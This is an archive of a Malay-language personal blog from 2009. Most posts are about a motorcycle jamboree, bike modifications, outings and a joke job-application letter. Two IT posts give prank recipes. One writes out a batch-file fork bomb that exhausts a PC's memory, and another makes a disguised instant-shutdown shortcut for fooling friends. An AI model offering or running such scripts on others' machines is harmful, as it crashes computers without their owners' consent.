Wednesday, December 30, 2009

My Ride: Jamboree Pertama FZ150i 2009

Pada 25hb Disember 2009 yang lalu Yamaha FZ150i Enthusiasts Forum telah menganjurkan jamboree yang julung kalinya untuk pengguna Yamaha FZ150i. Aku berkesempatan join jamboree yang berlangsung selama 2 hari ni.. Nak2 ni 1st time aku ride secara besar-besaran. Sebanyak lebih kurang 52 buah FZ150i (geng Central dan geng Northern) terlibat dengan konvoi dari Tol Gombak sehingga ke Tol Lanchang. Jalan time tu agak sesak, mungkin sebab orang dah mula balik kampung sebab cuti krismas.

Tetapi dengan bantuan Marshal konvoi bergerak lancar. Di Tol Lanchang konvoi bertemu dengan konvoi beberapa FZ150i (geng dari Southern dan Eastern). Selepas sesi fotografi dan penyerahan T-Shirt FZ150i Adventure tajaan HLY Yamaha, konvoi bergerak ke Lanchang untuk makan t.hari dan solat jumaat. Kemudian konvoi ke Pusat Perhilitan Gajah K. Gandah. Seterusnya konvoi bergerak ke Kuantan untuk ke penginapan di Amansari Resort. Malamnya sesi BBQ dan karaoke di D'lounge BBQ Restaurant. Keesokan harinya, peserta jamboree diberi taklimat tentang Safety Riding dari pihak Yamaha dan sesi motivasi dari saudara Adrey (forumer Yamaha FZ150i Enthusiasts). Pastu ada sesi cabutan bertuah, dan lucky me aku dapat cap dari yamaha (genuine part) hehehe..

Untuk part 1 ni, aku letakkan sikit je gambar pasal ni je yang aku ada sementara nak tunggu CD dari Myenthusiasts.Org Production. Untuk tahun depan jamboree mungkin akan di adakan di utara. So pada kengkawan yang rasa teracun dengan FZ150i ni, beli la cepat! Tahun depan belah ride sesama..

klik for large view

Time menunggu geng-geng yang lain di Tol Gombak
Motor2 otai
Marshall2 yang bertugasBerkumpul di tol LanchangSesi bergambar di tol Lanchang
Jamboree FZ150i 2009
Akan bersambung selepas menerima CD dari pihak produksi. TQ

Wednesday, November 25, 2009

Sembang: Resume yang pernah di terima MAS

Mohd Kamal Bin Abdul Ghafar
5 Jalan 3/4
Taman Bukit Indah
68000 Ampang Selangor.
(Rumah pakcik saya)

Tuan Pengurus Besar Kanan
Malaysia Airlines System
21 Sep 2005

Tuan,

Memohon Pekerjaan di Malaysia Airlines System.

Sehubungan dengan perkara diatas, saya Mohd Kamal Bin Abdul Ghafar no k/p 831021-10-5XXX mahu memohon untuk bekerja disyarikat tuan dalam bidang teknikal. Ini kerana saya sangat berminat & bersungguh2 sampai tak boleh tido malam mengingatkan pekerjaan dalam dalam bidang ini. Walaupun begitu saye mengaku sebab saye mintak kerja disini kerana Saya juga adalah seorang petani anggur. Disebabkan begitu pihak tuan Kenalah ambil saya bekerja disini.


1. Pihak tuan perlu tahu juga bahawasanya bapa saya iaitu ABD GHAFAR adalah seorang ahli KWSP. Jika pihak tuan tidak mengambil saya bekerja saya serta merta akan menyuruh bapa saya membekukan pengeluaran KWSP pihak tuan masa tua nanti. Jika pihak tuan tak nak susah baiklah ambil saya bekerja disini.Itu saja keotaian saya.

2. Untuk pengetahuan pihak tuan, disini saya akan tampilkan kelayakan akademik dan pengalaman kerja saya sebelum ini kepada tuan.

3. Akademik Sijil Pelajaran Malaysia Vokasional 1999-2000

Matapelajaran : (gred)
Bahasa Malaysia 6D
Bahasa Inggeris 6D
Sains 7E
Matematik 6D
Pendidikan Islam 5C
Sejarah 7E
Lukisan geometri 7E
Teknologi air-condition 6D
Kerja bengkel 3B

Sijil Kemahiran Malaysia 2001-2002 (MLVK)

Sijil Kejuruteraan Automotive (Tahap 1&2) dari Institut latihan Perindustrian Kementerian Sumber Manusia Malaysia

4. Pengalaman kerja
!P Pembantu mekanik kereta di Yusuf Workshop, Ipoh , Perak
!P Pembantu mekanik kereta di Dunlop Servitekar di Leboh Ampang, Kuala Lumpur (kedai gemok)
p/s (alignment kat situ tipu)
!P Staff pejabat di Gesundheit Worldwide di Semabok, Melaka. (pusat serenti)

5. Hanya ini sahaja dapat saya tampilkan kepada pihak tuan. Diharap dengan kelayakan yang saya ada, permohonan saya untuk bekerja disyarikat tuan dapat dipertimbangkan oleh tuan. Dan saya berasa gembira & seronok & akan belanja satu MAS makan sekiranya diterima bekerja di syarikat tuan dan saya berjanji akan bekerja dengan bersungguh-sungguh disamping bangun awal dan datang kerja awal. Saya tak tipu nie. Walaupun saya pernah ponteng skolah dan ditangkap beberapa kali saya akan insaf juga jika saya dapat kerja ini. Saya tidak akan hisap ganja lagi jikalau saya dapat kerja disini. Sekiranya saya didapati bersalah dalam apa2 juga kesalahan pihak tuan tidak boleh ambil tindakan yg kuat disamping menjentik jari saya sahaja. Untuk makluman tuan saya sangat kurus jikalau dirotan sekali tulang2 saya akan bersepai dan pihak tuan akan mendapat susah yang amat sangat. Saya juga berjanji tidak akan mencuri skru2 nat2 yg lawa2.jika saya nak mencuri saya akan ambil sahaja dan masuk dalam poket seluar itu tidak dikira mencuri. Saya pun dah penat menulis segala nya bermula & berakhir dgn baik. Jika pihak tuan tidak mengambil saya bekerja hidup pihak tuan akan berakhir dengan bacaan yasin. Dah kunjungan org ramai.

Sekian terima kasih.

Yang benar,
(Mohd Kamal Bin Abdul Ghafar)
25 Jalan 3/4
Taman Bukit Indah
68000 Ampang
Selangor

Credit to: IT Space and Brothers

Saturday, November 7, 2009

Review: Mobster 2:Vendetta

Baru-baru ni aku dah terjebak dengan game web simulator yang ber-platformkan Facebook ni.. konsepnya macam Mafia War dari Zynga tapi dengan interface yang lebih menarik.. Mission diagihkan mengikut kawasan(world map) dan ada certain mission terdiri daripada flash game.. Ada konsep rival, teammates, hitlist.. Try for more experience..

Tuesday, October 27, 2009

My Story: ITIS Team Building,Langkawi 2nd Batch

21hb-23hb Okt yang lepas aku berkesempatan mengikuti program team building.. wahaha,1st time jejak kaki kat langkawi nih.. masa aku baca tentatif program aku membayangkan boleh lagi ke aku ikut program camni.. dah lama xwat aktiviti fizikal macam ni.. Tapi bila dah sampai memang sangat happening... hehe.. ice breaking, mini explore race, jungle tracking(walaupun cuma sampai waterfall je), berakit kat laut.. totally memang happening..

Berikut adalah antara suasana masa team building.. (click for larger view)

Banner team building 2nd batch

Sesi Ice BreakingMasa ni tengah pikir camne nak amik botol tu tanpa badan melepasi tali..
Kerjasama berpasukan diperlukan sekali lagi
Aktiviti di Hutan Lipur Telaga TujuhAktiviti berakit di Pantai Pasir Tengkorak
Lineup ITIS Team Building 2nd batch

Monday, October 19, 2009

IT: Create Shortcut for Shutdown

Isnin datang lagi, biasa la 1st day ni malas sikit nak bergerak.. so tangan aku aktif mencari ilmu-ilmu baru ni.. dan hari ni aku nak kongsi dengan korang macam mana nak create shortcut untuk shutdown pc.. actually mende ni pun bleh pakai untuk prank memember.. hehehe..

Caranya simple je,
1. Right click pada desktop>New>Shortcut
2. Kemudian, masukkan command ni.. Shutdown -S -t 0

3. Pastu, click je next>Finish..
4. Satu shortcut dengan title "shutdown" akan keluar pada desktop korang. Korang boleh ubah icon dengan title shortcut tu kalau korang ada niat nak prank member.. hehe..

p/s: macam biasa la.. try at your own risk

Thursday, October 15, 2009

Art: Chibi Me

Hari ni malas plak aku nak keluar wat job.. so ni la xtiviti membuang masa aku kat opis petang ni.. cuba men-chibi-kan diri sendiri.. lawak plak aku tengok.. hahaha.. tangan keras plak nak men ngan photoshop..bleh la.. 1st try..



IT: Tutorial untuk CMD Bomb


Masa aku kat ofis dihabiskan lagi untuk meneroka mende2 xberfaedah.. so secara xsengaja aku terjumpa cara untuk create bomb menggunakan command prompt.. effect pada pc cuma setakat menaikkan virtual memory sampai paras hidung.. nak rasa camne test la.. hehe..

1. Mula-mula, open notepad.. Start>All program>Accessories>Notepad
2. Pastu taip code ni
start
%0
begin : s
3. Save as nama_apa_pun_bolehla.bat
4. dah siap tu korang run kan la.. hehehe

p/s: try at your own risk..

Monday, October 12, 2009

IT: NTLDR is missing

Baru2 ni kawan aku call, bertanyakan sama ada aku bleh x tlong selesaikan masalah dia ni.. bila dia on PC je akan keluar error 'NTLDR is missing' dan tiada option lain kecuali CTRL+ALT+DEL untuk restart.. bagaimanapun cara ini xdapat menyelesaikan masalah..

Lucky for him, aku dah banyak kali jumpa masalah macam ni masa buat desktop support di Menara Celcom dulu.. penyelesaiannya senang je..

Barang yang diperlukan;
-CD-ROM drive
-Source: Windows XP Installation CD

Caranya macam ni;
  1. Masukkan CD Win XP dalam CD-ROM drive tu dan reboot PC.(restart la maknanya tu)
  2. Selalunya akan keluar arahan macam ni 'press any key to boot from the CD'; so press la any key.
  3. Bila semua dah load, menu Windows XP setup akan keluar.. masa tu tekan R untuk option repair windows guna recovery console.
  4. Kemudian menu recovery console akan keluar, tekan 1 untuk log masuk dalam windows installation tu. Normally, cuma ada 1 windows je. Masukkan administrator password(ni korang kena tau la), enter je kalu password tu blank (maknanya korang memang xset password).
  5. Copy file macam kat bawah ni untuk dimasukkan ke directory. Kalau CD-ROM drive korang E: korang letak la E:, kalau X: letak la X: dan biasanya Windows directory ada di C:.
ni command untuk copy file tu;

copy e:\i386\ntldr c:\
copy e:\i386\ntdetect.com c:\

nota: kat sini aku letakkan e: sebagai cd-rom drive dan c: sebagai windows directory.

Bila dah setel semua tu, keluarkan cd dan reboot pc anda. Insya'allah berjaya.

Tambahan:
Untuk jalan lebih mudah, korang boleh search di google/yahoo.. taip "FixNtldr".. software ni boleh mudahkan korang tapi sebarang adware,spyware mahupun virus yang disertakan sekali dalam tu, tanggung sendiri la.. :p

Friday, October 9, 2009

My Story: Ada berani?


9 Okt 2009 - xsangka plak aku ada lagi durian ni.. ingatkan dah abis musim dah.. lupa plak tanya sapa yang organize makan durian ni.. so anggap je la division aku; ITIS (IT Infrastucture Services, TTDI) yang organize.. pasal majoriti orang kat sini memang orang ITIS.

Nak dijadikan cerita, masa aku turun ngan kroni2 orang memang dh ramai kerumun kemah durian tu..


Memang banyak durian, menu lain pun ada cuma xsempat nak snap je.. camera probs plak time2 camni.. Memang happening, suma orang enjoy makan durian.. haha, ITIS memang berani..

Review: PicJoke.com

1 website yang aku jumpa secara xsengaja.. user interface website ni memang xberapa menarik dan sangat simple tetapi hasil yang ia mampu beri agak boleh diterima untuk orang macam aku yang xde bakat dalam photomanipulation ataupun menggunakan perisian adobe photoshop. Template pula disusun secara archive mengikut bulan, nampak agak membosankan tapi membolehkan user memilih template secara lebih teratur.

So rating aku 3.5/5

Hasil yang aku dapat ;p

Monday, October 5, 2009

My Ride: My Machine New Look

02 Okt 2009 - Aku baru je wat simple upgrade kat bike aku.. jeles punya pasal tengok otai Fzian modified bike diaorang.. dapat je gaji aku pegi NKS Bike Sentul.. ingat nak survey harga je.. bleh plak tokey tu racun aku suruh pasang hari tu jugak.. aku pun jenis malas nak cari len dah.. sambar je la.. 1st day (01 Okt 2009) aku pegi cari "sampan" (ada orang panggil bajak, dada itik, lower fering dll) tapi dalam resit tulis Fibreglass Engine Cover FZ150 Long.. hahaha.. sebab model yang aku nak tu dah habis tinggal yang belum cat lagi.. so kena hantar kedai cat dulu la.. (deposit RM50).. so aritu aku pasang 'windshield' je.. (tokey kedai racun aku) nak amik jenis GIVI mahal sangat so aku amik KAPPA je.. boleh la kan.. Esoknya pegi balik NKS tu untuk pasang "sampan" tu.. berpeluh gak aku tengok mekanik NKS nak pasang.. sebab nk kena adjust banyak kali bagi ngam dengan body.. haha..(xpe,memang keje dia gak kan) dekat 3 jam aku melepak kat NKS tunggu motor aku siap(+tunggu giliran).. kena pasang bracket plak tu, 2 belah kanan.. 1 belah kiri..


Kos Keseluruhan:
  1. Fibreglass Engine Cover FZ150 Long+Installation : RM150.00
  2. Windshield Kappa Universal Tinted (A200) : RM150.00
Lokasi:
NKS Sport Bikers Sdn Bhd
630-636 Jalan Sentul
51000 Kuala Lumpur

Friday, October 2, 2009

My Story: One Utama Batting Cage

'Batting Cage'.. Baseball mungkin adalah sesuatu yang asing bagi rakyat Malaysia.. aku pun secara tak sengaja terjebak dengan hobi baru ni..xde la hebat sangat tapi boleh la kalu setakat nak lepas geram tu.. hahaha.. hayun kuat2 'baseball bat' tu.. bayangkan bola baseball tu muka orang yang terasa sangat nak hentam.. hahaha.. ntah sampai bila la hobi baru ni nak bertahan.. selagi ada duit kot..

Walaupun masa 1st time aku dapat pukul 3 biji je bola dari 10 biji.. tapi boleh la pasal aku memang xpernah pun pegang bat.. xpe.. next time i`ll be improve..



One Utama Batting Cage, Roof Top
RM7: 10 biji bola

Thursday, October 1, 2009

Review: Yamaha FZ150i Enthusiasts Forum

Forum yang memuat pelbagai info sama ada event, tutorial modifikasi, maklumat semasa dan gambar-gambar menarik bike otai2 yang telah menjalankan modifikasi.. ia juga turut memuatkan perkongsian idea dan ilmu teknikal berkaitan Yamaha FZ.. juga barangan dan perkhidmatan berkaitan motosikal untuk dijual atau ingin dibeli..
Menarik nih.. daftar pun percuma je..


Forum ni terbahagi kepada 5 bahagian, Northern, Central, Eastern, Southern dan Seberang Laut.. setiap bahagian kerap mengadakan aktiviti. Contohnya Central akan mengada FNF (Friday Night Fever) yang mana mereka akan berhimpun di satu lokasi untuk mengeratkan silaturrahim dan bertukar pandangan.. Ahli2 forum ini juga kerap mengadakan konvoi ke destinasi tertentu bagi mengui tahap keupayaan motor mereka..

My Ride: The Rise of Machine

Sebulan lepas (Ogos 2009) aku baru je beli Yamaha FZ150i.. harta pertama aku yang harga lebih RM1K.. Mula-mula sebelum beli tu banyak la khabar angin yang aku dengar.. xbest la mnde la.. so aku wat la research dan akhirnya aku jumpa website ni Yamaha FZ150i Enthusiasts Forum . Memang ramai otai2 FZ150i dalam tu.. dengan modifikasi yang nampak mengancam menjadikan moto ni lebih mantap..

My Bike
Ni antara reviews yang aku baca pasal motor ni..
Jenis enjin : 4 lejang, 1 silinder sejukan cecair, 4 injap (SHOC)
Gerek x lejang : ( 57mmx 58.7 mm)
Isi padu sesaran : 149.48cc
Kuasa maksimum : 11.1 kw/8500 rpm
Tork maksimum :13.1 Nm/7500 rpm
Sistem nyalaan : CD1
Transmisi : 5 kelajuan
Suspensi depan : Fork taleskopik
Suspensi belakang : Tunggal/monocross
Brek hadapan : Cakera tunggal
Brek belakang : Gelendong
Jenis kerangka : Berbentuk berlian/delatabox
Saiz tayar depan : 2.75-17 41P
Saiz tayar belakang : 90/90-17 M/C 49P
Tinggi pelana : 760 mm
Tapak roda : 1282 mm
kelegaan bumi : 167mm
P x L x T : (2,000 x 705 x 1035)mm
Berat kering : 98kg
Muatan tangki : 12 liter
Orang cakap motor ni xlaju.. mula2 aku xnafikan la.. kat jalan biasa mungkin kalah la.. tapi atas highway selepas beberapa siri percubaan.. tolak motor LC yang dah wat modifikasi, moto 150cc (2 stroke) n moto yg lebih 150cc xde lagi motor yang bleh cantas.. (saiz bdan aku kira kategori Heavyweight gak la).. memang puas hati.. minyak memang jimat.. bawak top speed pun bleh jimat lagi.. So apa nak cakap lagi.. totally aku memang puas ati ngan motor ni..

p/s:cmne pun aku tetap mengintai peluang nak upgrade CC motor.. (next could be 250cc bike)